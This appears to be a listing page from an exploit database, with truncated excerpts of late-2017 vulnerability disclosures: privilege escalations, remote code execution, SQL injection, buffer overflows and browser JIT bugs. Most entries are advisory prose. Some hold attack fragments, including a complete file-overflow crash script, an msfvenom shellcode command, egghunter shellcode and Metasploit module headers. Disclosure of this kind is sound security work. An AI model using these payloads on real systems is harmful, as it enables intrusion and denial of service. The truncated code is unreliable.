Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Remote Code Execution

Vulnerability Summary The following advisory describes a buffer overflow that leads to remote code execution found in Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 Dasan Networks GPON ONT WiFi Router “is indoor type ONT dedicated for FTTH Fibre to the...

Proxifier for Mac 2.19 - Local Privilege Escalation

With CVE-2017-7643 I disclosed a command injection vulnerablity in the KLoader binary that ships with Proxifier = 2.18. Unfortunately 2.19 is also vulnerable to a slightly different attack that yields the same result. When Proxifier is first run, if the KLoader binary is not suid root it gets...

Sera 1.2 - Local Privilege Escalation / Password Disclosure

Sera is a free app for mac and iOS that lets you unlock your mac automatically when your iphone is within a configured proximity. Unfortunately to facilitate this it stores the users login password in their home directory at: /Library/Preferences/no.ignitum.SeraOSX.plist This makes root privilege...

Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation

A couple of weeks ago I disclosed a local root privesc in Hashicorp's vagrant-vmware-fusion plugin: https://m4.rkw.io/blog/cve20177642-local-root-privesc-in-hashicorp-vagrantvmw... The initial patch they released was 4.0.21 which unfortunately contained a bug that prevented it from working at all...

Monstra CMS - Remote Code Execution

Monstra CMS - Remote Code Execution. CVE-2017-18048. Webapps exploit for PHP platform Vulnerabilities Summary The following advisory describes a vulnerability found in Monstra CMS. Monstra is “a modern and lightweight Content Management System. It is Easy to install, upgrade and use.” The...

Arq 5.9.7 - Local Privilege Escalation

=begin As well as the other bugs affecting Arq " backupset = "0" 40 hmac = "0" 40 payload = sprintf "%s%s%s%s$%s%s\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" +...

Hashicorp vagrant-vmware-fusion 5.0.1 - Local Privilege Escalation

I recently blogged about how the installation process of version 5.0.0 of this plugin could be hihacked by a local attacker or malware in order to escalate privileges to root. Hashicorp pushed some mitigations for this issue fairly quickly but unfortunately 5.0.1 is still exploitable with a...

Hashicorp vagrant-vmware-fusion 5.0.3 - Local Privilege Escalation

Another day, another root privesc bug in this plugin. Not quite so serious this time - this one is only exploitable if the user has the plugin installed but VMware Fusion not installed. This is a fairly unlikely scenario but it's a straight to root privesc with no user interaction so isn't the ki...

Murus 1.4.11 - Local Privilege Escalation

I recently blogged about the prevalence of escalation hijack vulnerabilities amongst macOS applications. One example of this is the latest version of Murus firewall. By design it requires the user to authenticate every time in order to obtain the access it needs to modify the firewall settings. I...

Arq 5.9.6 - Local Privilege Escalation

Arq Backup from Haystack Software is a great application for backing up macs and windows machines. Unfortunately versions of Arq for mac before 5.9.7 are vulnerable to a local root privilege escalation exploit. The updater binary has a "setpermissions" function which sets the suid bit and root...

Hashicorp vagrant-vmware-fusion 5.0.0 - Local Privilege Escalation

After three CVEs and multiple exploits disclosed to Hashicorp they have finally upped their game with this plugin. Now the previously vulnerable non-root-owned ruby code that get executed as root by the sudo helper is no more and the sudo helper itself is one static Go binary with...

FS Makemytrip Clone - 'id' SQL Injection

Exploit Title: FS Makemytrip Clone - SQL Injection Date: 2017-12-05 Exploit Author: Dan° Vendor Homepage: https://fortunescripts.com/ Software Link: https://fortunescripts.com/product/makemytrip-clone/ Version: 2017-12-05 Tested on: Kali Linux 2.0 PoC: SQL Injection on GET parameter = id...

Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation

I have previously disclosed a couple of bugs in Hashicorp's vagrant-vmware-fusion plugin for vagrant. Unfortunately the 4.0.23 release which was supposed to fix the previous bug I reported didn't address the issue, so Hashicorp quickly put out another release - 4.0.24 - after that but didn't upda...

VX Search 10.2.14 - 'command_name' Buffer Overflow

!/usr/bin/python print " VX Search Enterprise v10.2.14 Buffer Overflow SEH \n" Exploit Title : VX Search Enterprise v10.2.14 Buffer Overflow SEH Discovery by : W01fier00t Twitter : @wolfieroot Discovery Date : 22/11/2017 Software Link : http://www.vxsearch.com/setups/vxsearchentsetupv10.2.14.exe...

Readymade Classifieds Script 1.0 - SQL Injection

Exploit Title: Readymade Classifieds Script 1.0 - SQL Injection Dork: N/A Date: 02.12.2017 Vendor Homepage: http://www.scubez.net/ Software Link: http://www.posty.in/index.html Demo: http://www.posty.in/readymade-classifieds-demo.html Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64...

Techno Portfolio Management Panel - 'id' SQL Injection

Exploit Title: Techno - Portfolio Management Panel 1.0 - SQL Injection Dork: N/A Date: 02.12.2017 Vendor Homepage: https://codecanyon.net/user/engtechno Software Link: https://codecanyon.net/item/techno-portfolio-management-panel/20919551 Demo: http://dacy.esy.es/eng/ Version: 1.0 Category: Webap...

Perspective ICM Investigation & Case 5.1.1.16 - Privilege Escalation

Exploit Title: Privilege Escalation - Perspective ICM Investigation & Case - 5.1.1.16 Date Reported to vendor: Jun 28, 2017 Date Accepted by vendor: Jun 11, 2017 Exploit Author: [email protected] Vendor Homepage: www.resolver.com Version: Perspective ICM Investigation & Case -...

TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change

TeamViewer Permissions Hook V1 --- A proof of concept injectable C++ DLL, that uses naked inline hooking and direct memory modification to change TeamViewer permissions. Features As the Server - Enables extra menu item options on the right side pop-up menu. Most useful so far to enable the "switc...

Ruby < 2.2.8 / < 2.3.5 / < 2.4.2 / < 2.5.0-preview1 - 'NET::Ftp' Command Injection

While using NET::Ftp I realised you could get command execution through "malicious" file names. The problem lies in the gettextfileremotefile, localfile = File.basenameremotefile method. When looking at the source code, you'll note: def gettextfileremotefile, localfile = File.basenameremotefile,...

Artica Web Proxy 3.06 - Remote Code Execution

Credits: John Page aka Hyp3rlinX + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt + ISR: ApparitionSec Vendor: ======= www.articatech.com Product: ========= Artica Web Proxy v.3.06.112216...

Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow

Exploit Title: Socusoft Photo 2 Video Converter v8.0.0 Local Buffer Overflow Free and Professional variants Date: 01/12/2017 Exploit Author: Jason Magic ret2eax Vendor Homepage: www.socusoft.com Version: 8.0.0 Tested on: Windows Server 2008 R2 Socusoft's Photo 2 Video Converter v8.0.0 Free and...

Abyss Web Server < 2.11.6 - Heap Memory Corruption

Credits: John Page aka HyP3rlinX + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/ABYSS-WEB-SERVER-MEMORY-HEAP-CORRUPTION.txt + ISR: ApparitionSec Vendor: ========== aprelium.com Product: =========== Abyss Web Server v2.11.6 Vulnerability Type:...

MistServer 2.12 - Cross-Site Scripting

Credits: John Page aka Hyp3rlinX + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt + ISR: ApparitionSec Vendor: ============= mistserver.org Product: =========== MistServer v2.12 MistServer...

Jobs2Careers / Coroflot Clone - SQL Injection

Exploit Title: Jobs2Careers / Coroflot Clone - SQL Injection Date: 2017-11-30 Exploit Author: 8bitsec Vendor Homepage: http://www.i-netsolution.com/ Software Link: http://www.i-netsolution.com/product/jobs2careers-coroflot-jobs-clone-script/ Version: 30 November 17 Tested on: Kali Linux 2.0 | Mac...

Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)

// EDB Note: Source https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0 // EDB Note: Source https://github.com/bindecy/HugeDirtyCowPOC // Author Note: Before running, make sure to set transparent huge pages to "always": // echo always | sudo tee...

Axis Communications MPQT/PACS - Heap Overflow / Information Leakage

STX Subject: Axis Communications MPQT/PACS Heap Overflow and Information Leakage. Attack vector: Remote Authentication: Anonymous no credentials needed Researcher: bashis August 2017 PoC: https://github.com/mcw0/PoC Release date: December 1, 2017 Full Disclosure: 90 days due to the large volume o...

Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Mac OS X Root Privilege Escalation', 'Description' = %q This module exploits a serious flaw in MacOSX High Sierra. Any user can login with user...

pfSense - (Authenticated) Group Member Remote Command Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'pfSense authenticated group member RCE', 'Description' = %q pfSense, a free BSD based open source firewall distribution, version 's4squatch',...

QEMU - NBD Server Long Export Name Stack Buffer Overflow

Introduced in commit f37708f6b8 2.10. The NBD spec says a client can request export names up to 4096 bytes in length, even though they should not expect success on names longer than 256. However, qemu hard-codes the limit of 256, and fails to filter out a client that probes for a longer name; the...

HP iMC Plat 7.2 - Remote Code Execution (2)

!/opt/local/bin/python2.7 Exploit Title: HP iMC Plat 7.2 dbman Opcode 10008 Command Injection RCE Date: 11-29-2017 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.hpe.com Software Link:...

Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH)

!/usr/bin/python import struct Exploit Author: Miguel Mendez Z Exploit Title: Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode Date: 29-11-2017 Software: Dup Scout Enterprise Version: v10.0.18 Vendor Homepage: http://www.dupscout.com Software Link:...

Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation

Source: https://twitter.com/lemiorhan/status/935578694541770752 & https://forums.developer.apple.com/thread/79235 "Dear @AppleSupport, we noticed a HUGE security issue at MacOS High Sierra. Anyone can login as "root" with empty password after clicking on login button several times. Are you aware ...

HP iMC Plat 7.2 - Remote Code Execution

!/opt/local/bin/python2.7 Exploit Title: HP iMC Plat 7.2 dbman Opcode 10007 Command Injection RCE Date: 11-28-2017 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.hpe.com Software Link:...

WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal

Exploit Title: WordPress woocommerce directory traversal Date: 28-11-2017 Software Link: https://wordpress.org/plugins/woocommerce/ Exploit Author:fu2x2000 Contact: [email protected] Website: CVE:2017-17058 Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0 Category: webapps 1. Description...

Synology StorageManager 5.2 - Root Remote Command Execution

''' SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution Full report: https://blogs.securiteam.com/index.php/archives/3540 Twitter: @SecuriTeamSSD Weibo: SecuriTeamSSD Vulnerability Summary The following advisory describes a remote command execution vulnerability found in...

Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download

''' Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1342 There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name...

Diving Log 6.0 - XML External Entity Injection

Exploit Title: Diving Log 6.0 XXE Injection + Date: 27-11-2017 + Exploit Author: Trent Gordon + Vendor Homepage: http://www.divinglog.de + Software Link: http://www.divinglog.de/english/download/ + Disclosed at: https://thenopsled.com/divinglog.txt + Version: 6.0 + Tested on: Windows 7 SP1,...

Microsoft Edge Chakra JIT - 'Inline::InlineCallApplyTarget_Shared' does not Return the return Instruction

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1366 Here's a snippet of Inline::Optimize. FOREACHINSTREDITINGinstr, instrNext, func-mheadInstr switch instr-mopcode case Js::OpCode::Label: ... if instr-AsLabelInstr-misForInExit Assertthis-currentForInDepth != 0; // The PoC hit...

ALLPlayer 7.5 - Denial of-Service (PoC)

!/usr/bin/python buffer = b"http://" buffer += b"\x41" 1500 f=open"player.m3u","wb" f.writebuffer f.close...

Microsoft Windows 10 (Build 1703 Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation

/ EDB Note Source https://gist.github.com/xpn/736daa4d1ff7b9869f4b3d1e9a34d315/ff2e2465d4a07588d0148dc87e77b17b41ef9d1d Source https://blog.xpnsec.com/windows-warbird-privesc/ Source https://github.com/xpn/warbirdexploit Ref https://bugs.chromium.org/p/project-zero/issues/detail?id=1391 / //...

Microsoft Edge Chakra JIT - 'BailOutOnTaggedValue' Bailouts Type Confusion

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1364 1. In the Chakra's JIT compilation process, it stores variables' type information by basic block. function optb let o; if b // BASIC BLOCK a o = ; else // BASIC BLOCK b o = 1.1; // BASIC BLOCK c return o; For example, let's...

ZTE ZXDSL 831CII - Improper Access Restrictions

Exploit Title: ZTE ZXDSL 831 Unauthorized Configuration Access Date: 27/11/2017 Exploit Author: Ibad Shah Vendor Homepage: zte.com.cn Software Link: - Version: - ZXDSL - 831CII Tested on: Windows 10 CVE :- 2017-16953 ======================================= The Router usually servers html files &...

Exim 4.89 - 'BDAT' Denial of Service

While parsing BDAT data header, exim still scans for '.' and consider it the end of mail. https://github.com/Exim/exim/blob/master/src/src/receive.cL1867 Exim goes into an incorrect state after this message is sent because the function pointer receivegetc is not reset. If the following command is...

Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1365 Some background: https://bugs.chromium.org/p/project-zero/issues/detail?id=1364 There's one more place that emits a BailOnNotObject opcode. Here's a snippet of GlobOpt::OptTagChecks. if valueType.CanBeTaggedValue &&...

Microsoft Edge Chakra JIT - Incorrect Function Declaration Scope

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1367 In the following JavaScript code, both of the print calls must print out "undefined" because of "x" is a formal parameter. But the second print call prints out "function x ". This bug may lead to type confusion in JITed code...

ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)

!/usr/bin/python Tested on: Windows 10 Professional x86 Exploit for previous version: https://www.exploit-db.com/exploits/42455/ Seems they haven't patched the vulnerability at all :D msfvenom -p windows/exec CMD="calc.exe" -e x86/unicodemixed BufferRegister=EAX -f python shellcode = "" shellcode...

Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1431 I found the following bug with an AFL-based fuzzer: When walkpagerange is used on a VMHUGETLB VMA, callbacks from the mmwalk structure are only invoked for present pages. However, domincore assumes that it will always get...

Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation

Vulnerability Summary The following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem – XFRM. Netlink is used to transfer information between the kernel and user-space processes. It...

Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)

Linux/x64 - Egghunter 0xbeefbeef Shellcode 34 bytes. Shellcode exploit for Linuxx86-64 platform global start section .text start: xor rsi,rsi push rsi ; starts the search at position 0 pop rdi nextpage: or di,0xfff inc rdi next4bytes: push 21 pop rax syscall cmp al,0xf2 jz nextpage mov...

WebKit - 'WebCore::PositionIterator::decrement' Use-After-Free

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1346 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / function jsfuzzer...